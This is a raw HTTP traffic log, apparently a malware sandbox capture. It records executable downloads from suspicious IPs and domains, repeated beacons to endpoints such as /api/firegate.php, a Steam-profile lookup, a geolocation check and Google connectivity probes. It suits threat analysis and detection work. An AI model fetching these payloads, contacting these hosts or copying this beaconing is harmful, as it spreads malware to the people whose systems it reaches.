HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:06 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: AC46E9B9:E30C_93878F2E:0050_64C84566_1E6EBBDD:24679 X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cL9znvaYVLzbtRwPmu2EQ%2FpbRAG7FAJX7%2BDAi%2BEnu1ej9jkrWry3gOBOxOjA4wQw6nSl3681I6dg1WaFKs%2BtzPanhLgET88HPDgg%2BcHEgotCdG%2BVwOEqI%2F3xFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ef9a95f7dda8361-KIX alt-svc: h3=":443"; ma=86400

GET /profiles/76561199529242058 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: steamcommunity.com

HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 31 Jul 2023 23:36:17 GMT Content-Length: 33253 Connection: keep-alive Set-Cookie: sessionid=1bf538ef6b6e85f50e3c6052; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:13 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:19 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 4332 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /info/photo443.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.231 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 657408 Content-Type: application/octet-stream Last-Modified: Tue, 01 Aug 2023 07:33:59 GMT Accept-Ranges: bytes ETag: "ce4f62894ac4d91:0" Server: Microsoft-IIS/10.0 Date: Tue, 01 Aug 2023 07:35:19 GMT

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=0 Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Tue, 01 Aug 2023 00:35:20 GMT Date: Mon, 31 Jul 2023 23:35:20 GMT Connection: keep-alive

GET /info/photo443.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.231 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 01 Aug 2023 07:33:59 GMT Accept-Ranges: bytes ETag: "ce4f62894ac4d91:0" Server: Microsoft-IIS/10.0 Date: Tue, 01 Aug 2023 07:35:20 GMT Content-Length: 657408

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 31 Jul 2023 23:35:21 GMT Content-Type: application/octet-stream Content-Length: 268288 Last-Modified: Mon, 31 Jul 2023 23:30:02 GMT Connection: keep-alive ETag: "64c843fa-41800" Accept-Ranges: bytes

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 31 Jul 2023 23:35:21 GMT Content-Type: application/octet-stream Content-Length: 342016 Last-Modified: Mon, 31 Jul 2023 10:07:48 GMT Connection: keep-alive ETag: "64c787f4-53800" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 31 Jul 2023 23:35:21 GMT Content-Type: application/octet-stream Content-Length: 342016 Last-Modified: Mon, 31 Jul 2023 10:07:48 GMT Connection: keep-alive ETag: "64c787f4-53800" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:35:22 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="cm5d5bv15d.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 31 Jul 2023 23:35:22 GMT Content-Type: application/octet-stream Content-Length: 268288 Last-Modified: Mon, 31 Jul 2023 23:30:02 GMT Connection: keep-alive ETag: "64c843fa-41800" Accept-Ranges: bytes

GET /sts/imagc.jpg HTTP/1.1 User-Agent: HTTPREAD Host: us.imgjeoigaa.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 31 Jul 2023 23:36:03 GMT Content-Type: image/jpeg Content-Length: 1506508 Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT Connection: keep-alive ETag: "649b9ca8-16fccc" Accept-Ranges: bytes

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 541 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:04 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:05 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /check/safe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jul 2023 23:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /check/?sid=181850&key=8240077a9356286e413223063c28ca19 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Content-Length: 160 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jul 2023 23:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Mon, 31 Jul 2023 23:36:06 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 01 Aug 2023 00:36:06 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7ef9a9616b0a351a-ICN

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:07 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8

GET /acea55252b775eee1be2febeda0c0d49 HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7 Host: 78.47.122.222

HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jul 2023 23:36:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /pack.zip HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7 Host: 78.47.122.222 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jul 2023 23:36:19 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ad4B0oRwiF0hDyILkfgHcQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFRqL_SIVhnjPfckOmUQpjjvLlsnb8Pnk-d18fiS9cFvkcZsZd-8C0; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=c9cRYa3JannFBdim4uIYFU7ngu-YWwNPUuqb_m2mCZ9fj4CTiRao5qhWOybPTFzu44ggyNWf7u2kVu4oLctdXQHk5TxYXcp3551fK5LUSl9WGd3hZBYO4UqSUlq1hecIOyymaRW8_xNLNaFEsjJUQ1R2XKyAnVVXf4a-h8jlFak; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_5TMY87UYJZfunWAhHJY5A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2315 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVEf-q8Od9Pad9kvB7jLaVpRQScPkH59JuMiPagJMJw_V3EU3ogrX3o; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=aeOpR73Q_VavJQtTSznBNIUWGo04lkgace0vtTGaO2_dv8FiiowdoaFoI6Z-kyPrKM-eSIsg1bGdyoLsnYaumvnX8ZWumZ8g-_44CS9hA0y4nN-iKN6qPuzh3IKQxf3122oTHxYKP5yGYVNr4bDMIIFl-gy4eEQafADSVzCnNEo; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yx0zAZqflLFr6p0BBkCdhQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2321 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVGL-0LtzmxNBP74l-ylTvuUvM0FwOkMg4kz747O1rtGA09XEe4-Yws; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=dbTcd1lboItt3_CSWrS8co3lUIAYUAAVBgxYH1RzjNVjvbXPm5heZI132YhbPEIXs3an_qhaiD6VzGuGcWbfEngZLrfMmmDUoyJU3Ge8WjiSdVnz4QteL2nKQJb4t1cXqixIXCboEcY4xfbEV1nTZFIi_yQaI9yl3l2_sPBibak; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-gsyMlDfUrnd-DVSP20uUpQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2319 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVE-2g4PwkxZevkheEot8qzTAA4khBsqm2UpGOwbJl0-HJQjM36iit4; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=Xu37e4DC_RWnGHkM5ildywiStpOnevfKeL9vRPnRNxTtkE_o_odS2tjxke8CxIlz6SOwIW2GpiXsqzHrQ-hDfKbnko6Vx6HDg2yGoayg1bl80dFXLev2p4UgffUgCGXnqQh7TJ0adThG_qFv0rHaOHQUF7g6FBmCN0BHvig3Wx8; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-zY45of4VGKms9HlsNnu7Tg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVGuppeDzRiNHDV3dpwnnExDuzsA4qbkdaaTw0WGFz5b2iFjF4WYLw; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=Ak3p3VlfmSlUMscULY7UXDq7CnRylbBoMeMwKp0JjS7YHan1NmWCGB1FJpdxKI1Tl2yEznEPaD949YfHUhBisrIyvxqU0_urYqUpWZZ-zy4IGp-IzNS6d0KAvXXzepBbeqfL0lc4OgqsjHf1bdJbo4bXC6z4IsMGlT07RJX5BnA; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-gm2zpQVdiP63_NINIjW1Fg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2320 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:33 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFtTnlBSu0qqh6Qn8t03hmG4epu_LUtl-DXh2AXY9eA8kzcA7w4xbg; expires=Sat, 27-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=FA07FFQrYlok52a-4UhXiSv8x-LL3cptrIbPIqGAePZijSGeev__-zGEu-fRfrlZWghL_jKf410Y5dyMpMoQKUatyMqcCybZ7V3frWj-xUPFSwVM8uA0A4lU4LVK6_lSLQD9Av5-QelYG_lhi25PZzs87U-NfVLlBt0tw2uao3k; expires=Tue, 30-Jan-2024 23:36:33 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 31 Jul 2023 23:36:36 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-y5cnmogR-gCFxaJImWg0Bg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2315 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-31-23; expires=Wed, 30-Aug-2023 23:36:36 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFyW_7ImGcZ5VB7crmYAELMvwQX6y2prEFoWhBxDQ-KyPZa8IWSs0E; expires=Sat, 27-Jan-2024 23:36:36 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=kHM4wwex4wQTR2PD6M_nQxzcbLeP87VvVfuq4wPADY8pOGwemxH_w6PRchUpj2XKaGHOe3olPbSywZ1bi6OZrf7D_56DqClRHelQ0Xlx1SX-5ab6gnDWBhKGQAWLKCxC8iwfnuaamy36ae0NCmFEXvKdVuXjEDmi3fb0LfxIKh0; expires=Tue, 30-Jan-2024 23:36:36 GMT; path=/; domain=.google.com; HttpOnly